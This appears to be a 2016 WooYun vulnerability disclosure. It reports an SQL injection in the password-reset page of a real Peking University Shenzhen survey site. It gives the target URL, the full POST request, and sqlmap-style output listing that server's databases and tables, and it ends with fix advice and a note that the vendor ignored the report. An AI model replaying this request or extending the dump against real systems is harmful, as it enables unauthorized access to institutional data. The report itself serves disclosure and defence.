2016-05-02: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经主动忽略漏洞,细节向公众公开
博学,审问,慎思,明辨
注入点:
http://form.pkusz.edu.cn/oqss/user/ForgetPSW.aspx
POST 参数(原报告未指明具体哪个参数存在注入):
Button1=%e9%87%8d%e7%bd%ae%e5%af%86%e7%a0%81&PA=1&PQ=1&UserName=xocfkxww&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBQLV%2b5isDAKvruq2CALw7%2bbwDALw76bwDAKM54rGBv6SFMQHN5UJ5LNXAH5T/7inwSUr&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE3NTkwMTAzNDVkZIIFln7202IZji6%2bywoP6RcVWrgJ&__VIEWSTATEGENERATOR=395425C1
数据库:
数据库表:
Database: OQSS35[144 tables]+---------------------------------------------------+| AnswerPSW || AnsweredSurvey || BBS || Business || City || Color || CondtionTable || Config || CustomizeReport || Dep || EmailAccount || ExchangeAward || GULevel || GUTable || HeadFoot || ItemLib || ItemTableExpand || ItemTableExpand || LanTable || OQSSSysInfo || ObserverViewList || OptionCode1 || OptionCode1 || OptionCode2 || OptionTable || PageStyle || PageTable || Profession || Province || Quota || RandomAnswer || Reg || ReviewPoint || SA || SN || SchoolRecord || SendTask || StatResult || StyleLib || SurveyClass || SurveyExpand || SurveyLib || SurveyTable || UserGroup || UserGroup || Z495 || Z523 || Z524 || Z527 || Z528 || Z529 || Z530 || Z532 || Z533 || Z534 || Z535 || Z536 || Z537 || Z538 || Z540 || Z541 || Z544 || Z546 || Z547 || Z549 || Z550 || Z551 || Z552 || Z553 || Z556 || Z557 || Z559 || Z560 || Z561 || Z562 || Z563 || Z565 || Z566 || Z567 || Z570 || Z573 || Z576 || Z577 || Z579 || Z580 || Z582 || Z584 || Z585 || Z587 || Z595 || Z597 || Z598 || Z599 || Z602 || Z607 || Z615 || Z618 || Z621 || Z622 || Z623 || Z624 || Z625 || Z627 || Z628 || Z630 || Z631 || Z633 || Z634 || Z637 || Z639 || Z645 || Z647 || Z648 || Z653 || Z654 || Z664 || Z667 || Z668 || Z669 || Z670 || Z672 || Z674 || Z675 || Z679 || Z681 || Z682 || Z683 || Z684 || Z791 || Z792 || Z794 || Z795 || Z800 || Z801 || Z803 || Z804 || Z805 || Z806 || award || dtproperties || enAnswerList || ip || limitsTable || sqlmapoutput |+---------------------------------------------------+Database: master[291 tables]+---------------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || 
INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_values || sys.all_columns || sys.all_objects || sys.all_parameters || sys.all_sql_modules || sys.all_views || sys.allocation_units || sys.assemblies || sys.assembly_files || sys.assembly_modules || sys.assembly_references || sys.assembly_types || sys.asymmetric_keys || sys.backup_devices || sys.certificates || sys.check_constraints || sys.column_type_usages || sys.column_xml_schema_collection_usages || sys.columns || sys.computed_columns || sys.configurations || sys.conversation_endpoints || sys.conversation_groups || sys.credentials || sys.crypt_properties || sys.data_spaces || sys.database_files || sys.database_mirroring_endpoints || sys.database_mirroring_endpoints || sys.database_mirroring_witnesses || sys.database_permissions || sys.database_principal_aliases || sys.database_principals || sys.database_recovery_status || sys.database_role_members || sys.databases || sys.default_constraints || sys.destination_data_spaces || sys.dm_broker_activated_tasks || sys.dm_broker_connections || sys.dm_broker_forwarded_messages || sys.dm_broker_queue_monitors || sys.dm_clr_appdomains || sys.dm_clr_loaded_assemblies || sys.dm_clr_properties || sys.dm_clr_tasks || sys.dm_db_file_space_usage || sys.dm_db_index_usage_stats || sys.dm_db_mirroring_connections || sys.dm_db_missing_index_details || sys.dm_db_missing_index_group_stats || sys.dm_db_missing_index_groups || sys.dm_db_partition_stats || sys.dm_db_session_space_usage || sys.dm_db_task_space_usage || sys.dm_exec_background_job_queue_stats || 
sys.dm_exec_background_job_queue_stats || sys.dm_exec_cached_plans || sys.dm_exec_connections || sys.dm_exec_query_memory_grants || sys.dm_exec_query_optimizer_info || sys.dm_exec_query_resource_semaphores || sys.dm_exec_query_stats || sys.dm_exec_query_transformation_stats || sys.dm_exec_requests || sys.dm_exec_sessions || sys.dm_fts_active_catalogs || sys.dm_fts_index_population || sys.dm_fts_memory_buffers || sys.dm_fts_memory_pools || sys.dm_fts_population_ranges || sys.dm_io_backup_tapes || sys.dm_io_cluster_shared_drives || sys.dm_io_pending_io_requests || sys.dm_os_buffer_descriptors || sys.dm_os_child_instances || sys.dm_os_cluster_nodes || sys.dm_os_hosts || sys.dm_os_latch_stats || sys.dm_os_loaded_modules || sys.dm_os_memory_allocations || sys.dm_os_memory_cache_clock_hands || sys.dm_os_memory_cache_counters || sys.dm_os_memory_cache_entries || sys.dm_os_memory_cache_hash_tables || sys.dm_os_memory_clerks || sys.dm_os_memory_objects || sys.dm_os_memory_pools || sys.dm_os_performance_counters || sys.dm_os_ring_buffers || sys.dm_os_schedulers || sys.dm_os_stacks || sys.dm_os_sublatches || sys.dm_os_sys_info || sys.dm_os_tasks || sys.dm_os_threads || sys.dm_os_virtual_address_dump || sys.dm_os_wait_stats || sys.dm_os_waiting_tasks || sys.dm_os_worker_local_storage || sys.dm_os_workers || sys.dm_qn_subscriptions || sys.dm_repl_articles || sys.dm_repl_schemas || sys.dm_repl_tranhash || sys.dm_repl_traninfo || sys.dm_tran_active_snapshot_database_transactions || sys.dm_tran_active_transactions || sys.dm_tran_current_snapshot || sys.dm_tran_current_transaction || sys.dm_tran_database_transactions || sys.dm_tran_locks || sys.dm_tran_session_transactions || sys.dm_tran_top_version_generators || sys.dm_tran_transactions_snapshot || sys.dm_tran_version_store || sys.endpoint_webmethods || sys.endpoints || sys.event_notification_event_types || sys.event_notifications || sys.events || sys.extended_procedures || sys.extended_properties || sys.filegroups || 
sys.foreign_key_columns || sys.foreign_keys || sys.fulltext_catalogs || sys.fulltext_document_types || sys.fulltext_index_catalog_usages || sys.fulltext_index_columns || sys.fulltext_indexes || sys.fulltext_languages || sys.http_endpoints || sys.identity_columns || sys.index_columns || sys.indexes || sys.internal_tables || sys.key_constraints || sys.key_encryptions || sys.linked_logins || sys.login_token || sys.master_files || sys.master_key_passwords || sys.message_type_xml_schema_collection_usages || sys.messages || sys.module_assembly_usages || sys.numbered_procedure_parameters || sys.numbered_procedures || sys.objects || sys.openkeys || sys.parameter_type_usages || sys.parameter_xml_schema_collection_usages || sys.parameters || sys.partition_functions || sys.partition_parameters || sys.partition_range_values || sys.partition_schemes || sys.partitions || sys.plan_guides || sys.procedures || sys.remote_logins || sys.remote_service_bindings || sys.routes || sys.schemas || sys.securable_classes || sys.server_assembly_modules || sys.server_event_notifications || sys.server_events || sys.server_permissions || sys.server_principals || sys.server_role_members || sys.server_sql_modules || sys.server_trigger_events || sys.server_triggers || sys.servers || sys.service_broker_endpoints || sys.service_contract_message_usages || sys.service_contract_usages || sys.service_contracts || sys.service_message_types || sys.service_queue_usages || sys.service_queues || sys.services || sys.soap_endpoints || sys.sql_dependencies || sys.sql_logins || sys.sql_modules || sys.stats_columns || sys.stats_columns || sys.symmetric_keys || sys.synonyms || sys.sysaltfiles || sys.syscacheobjects || sys.syscharsets || sys.syscolumns || sys.syscomments || sys.sysconfigures || sys.sysconstraints || sys.syscurconfigs || sys.syscursorcolumns || sys.syscursorrefs || sys.syscursors || sys.syscursortables || sys.sysdatabases || sys.sysdepends || sys.sysdevices || sys.sysfilegroups || sys.sysfiles || 
sys.sysforeignkeys || sys.sysfulltextcatalogs || sys.sysindexes || sys.sysindexkeys || sys.syslanguages || sys.syslockinfo || sys.syslogins || sys.sysmembers || sys.sysmessages || sys.sysobjects || sys.sysoledbusers || sys.sysopentapes || sys.sysperfinfo || sys.syspermissions || sys.sysprocesses || sys.sysprotects || sys.sysreferences || sys.sysremotelogins || sys.syssegments || sys.sysservers || sys.system_columns || sys.system_components_surface_area_configuration || sys.system_internals_allocation_units || sys.system_internals_partition_columns || sys.system_internals_partitions || sys.system_objects || sys.system_parameters || sys.system_sql_modules || sys.system_views || sys.systypes || sys.sysusers || sys.tables || sys.tcp_endpoints || sys.trace_categories || sys.trace_columns || sys.trace_event_bindings || sys.trace_events || sys.trace_subclass_values || sys.traces || sys.transmission_queue || sys.trigger_events || sys.triggers || sys.type_assembly_usages || sys.types || sys.user_token || sys.via_endpoints || sys.views || sys.xml_indexes || sys.xml_schema_attributes || sys.xml_schema_collections || sys.xml_schema_component_placements || sys.xml_schema_components || sys.xml_schema_elements || sys.xml_schema_facets || sys.xml_schema_model_groups || sys.xml_schema_namespaces || sys.xml_schema_types || sys.xml_schema_wildcard_namespaces || sys.xml_schema_wildcards |+---------------------------------------------------+Database: msdb[9 tables]+---------------------------------------------------+| backupfile || backupmediafamily || backupmediaset || backupset || logmarkhistory || restorefilegroup || restorefilegroup || restorehistory || suspect_pages |+---------------------------------------------------+
仅证明危害,不深入。
过滤用户输入(仅靠过滤容易被绕过,更稳妥的做法是对数据库查询使用参数化查询)。
希望学校的网站越来越安全!
危害等级:无影响厂商忽略
忽略时间:2016-05-09 09:00
漏洞Rank:4 (WooYun评价)
暂无